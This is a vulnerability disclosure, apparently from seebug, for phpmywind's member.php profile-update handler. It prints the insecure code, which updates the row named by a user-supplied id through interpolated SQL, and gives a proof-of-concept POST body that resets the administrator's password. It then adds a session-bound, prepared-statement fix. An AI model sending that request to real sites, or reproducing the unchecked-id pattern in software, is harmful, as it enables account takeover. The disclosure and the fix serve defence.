<ul><li>/member.php</li></ul><pre class="">//initialize parameters
……
$id = isset($id) ? intval($id) : 0;
……
//update profile
else if($a == 'saveedit')
{
    //check data completeness
    if($password!=$repassword or $email=='')
    {
        header('location:?c=edit');
        exit();
    }
    //HTML-escape variables
    ....
    //check that the old password is correct
    if($password != '')
    {
        $oldpassword = md5(md5($oldpassword));
        $r = $dosql->GetOne("SELECT `password` FROM `#@__member` WHERE `username`='$c_uname'");
        if($r['password'] != $oldpassword)
        {
            ShowMsg('抱歉,旧密码错误!','-1');
            exit();
        }
    }
    $sql = "UPDATE `#@__member` SET ";
    if($password != '')
    {
        $password = md5(md5($password));
        $sql .= "password='$password', ";
    }
    @$sql .= "question='$question', answer='$answer', cnname='$cnname', enname='$enname', sex='$sex', birthtype='$birthtype', birth_year='$birth_year', birth_month='$birth_month', birth_day='$birth_day', astro='$astro', bloodtype='$bloodtype', trade='$trade', live_prov='$live_prov', live_city='$live_city', live_country='$live_country', home_prov='$home_prov', home_city='$home_city', home_country='$home_country', cardtype='$cardtype', cardnum='$cardnum', intro='$intro', email='$email', qqnum='$qqnum', mobile='$mobile', telephone='$telephone', address_prov='$address_prov', address_city='$address_city', address_country='$address_country', address='$address', zipcode='$zipcode' WHERE id=$id";
    if($dosql->ExecNoneQuery($sql))
    {
        ShowMsg('资料更新成功!','?c=edit');
        exit();
    }
}
</pre><p>Here <code>$id</code> is the id supplied by the user. The old-password check is performed against the currently logged-in user's row (<code>$c_uname</code>), but the UPDATE is bound to <code>WHERE id=$id</code>, and nothing verifies that this id belongs to the current user. As a result, any user's profile and password can be modified.</p><p>Register a user with the password 123123 and log in.</p><p>Send a request to:</p><pre class="">http://10.211.55.3/phpmywind/member.php?e=saveedit</pre><p>with the body:</p><pre class="">oldpassword=123123&password=123123&repassword=123123&email=123%40asd.com&action=update&id=1</pre><p>where id is the administrator's id; the response reports that the update succeeded.</p><p><img alt="F239CB78-0D1E-48D6-BA41-E149C00F8F14.png" src="https://images.seebug.org/@/uploads/1434593982773-F239CB78-0D1E-48D6-BA41-E149C00F8F14.png" data-image-size="710,259"><br></p><p>Log in to the admin account with 123123.</p><p><img alt="1D1559B5-EA63-4E44-93F7-7B1CACF21C0E.png" src="https://images.seebug.org/@/uploads/1434593987952-1D1559B5-EA63-4E44-93F7-7B1CACF21C0E.png" data-image-size="564,226"><br></p>
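<p>The fix a maintainer would apply to the handler above, as an added example that is not phpmywind's own code: the row being updated is taken from the authenticated session instead of from the request, the old-password check is run against that same row, and all values are bound through prepared statements rather than interpolated into the SQL string. The session key <code>member_id</code>, the <code>members</code> table with its <code>password_hash</code> column, the PDO handle and the in-memory SQLite sample data are all assumptions made for this example.</p>

```php
<?php
// Added example (not phpmywind code): bind the profile update to the
// authenticated member, never to a request-supplied id.
// Assumptions: $_SESSION['member_id'] is set at login; table `members`
// has columns id, username, password_hash, email; $pdo is a PDO handle.

function saveEdit(PDO $pdo, array $post): string
{
    // The target row is decided by the session, so an id in the
    // request body (like id=1 in the report above) is simply ignored.
    if (empty($_SESSION['member_id'])) {
        return 'not logged in';
    }
    $memberId = (int) $_SESSION['member_id'];

    $password    = $post['password']    ?? '';
    $repassword  = $post['repassword']  ?? '';
    $oldpassword = $post['oldpassword'] ?? '';
    $email       = trim($post['email']  ?? '');

    if ($password !== $repassword || $email === '') {
        return 'incomplete data';
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return 'invalid email';
    }

    $sets   = ['email = :email'];
    $params = [':email' => $email, ':id' => $memberId];

    if ($password !== '') {
        // Re-authenticate against the session user's own stored hash.
        $stmt = $pdo->prepare('SELECT password_hash FROM members WHERE id = :id');
        $stmt->execute([':id' => $memberId]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        if ($row === false || !password_verify($oldpassword, $row['password_hash'])) {
            return 'old password incorrect';
        }
        $sets[]          = 'password_hash = :hash';
        $params[':hash'] = password_hash($password, PASSWORD_DEFAULT);
    }

    // The WHERE clause is fixed to the session id and every value is a
    // bound parameter, so no request data reaches the SQL text.
    $sql  = 'UPDATE members SET ' . implode(', ', $sets) . ' WHERE id = :id';
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);

    return 'ok';
}

// Self-contained demonstration on an in-memory SQLite database
// (constructed sample accounts, not data from the original report).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, email TEXT)');
$ins = $pdo->prepare('INSERT INTO members (id, username, password_hash, email) VALUES (?, ?, ?, ?)');
$ins->execute([1, 'admin', password_hash('admin-secret', PASSWORD_DEFAULT), 'admin@example.com']);
$ins->execute([2, 'alice', password_hash('123123', PASSWORD_DEFAULT), 'alice@example.com']);

// alice (id 2) is the logged-in member; the request still carries id=1.
$_SESSION = ['member_id' => 2];
$result = saveEdit($pdo, [
    'oldpassword' => '123123',
    'password'    => 'new-pass',
    'repassword'  => 'new-pass',
    'email'       => 'alice@example.com',
    'id'          => '1',
]);
echo 'result: ', $result, PHP_EOL;

$rows = $pdo->query('SELECT id, password_hash FROM members ORDER BY id')->fetchAll(PDO::FETCH_ASSOC);
echo password_verify('admin-secret', $rows[0]['password_hash']) ? "admin: unchanged\n" : "admin: CHANGED\n";
echo password_verify('new-pass', $rows[1]['password_hash']) ? "alice: updated\n" : "alice: not updated\n";
```

<p>Running this with <code>php</code> on the CLI shows the admin row untouched while alice's own hash is rotated, regardless of what id the request body carried. The same pattern applies to the rest of the profile columns in the original UPDATE: append each as a bound <code>column = :param</code> pair to <code>$sets</code>, keeping the fixed <code>WHERE id = :id</code> clause.</p>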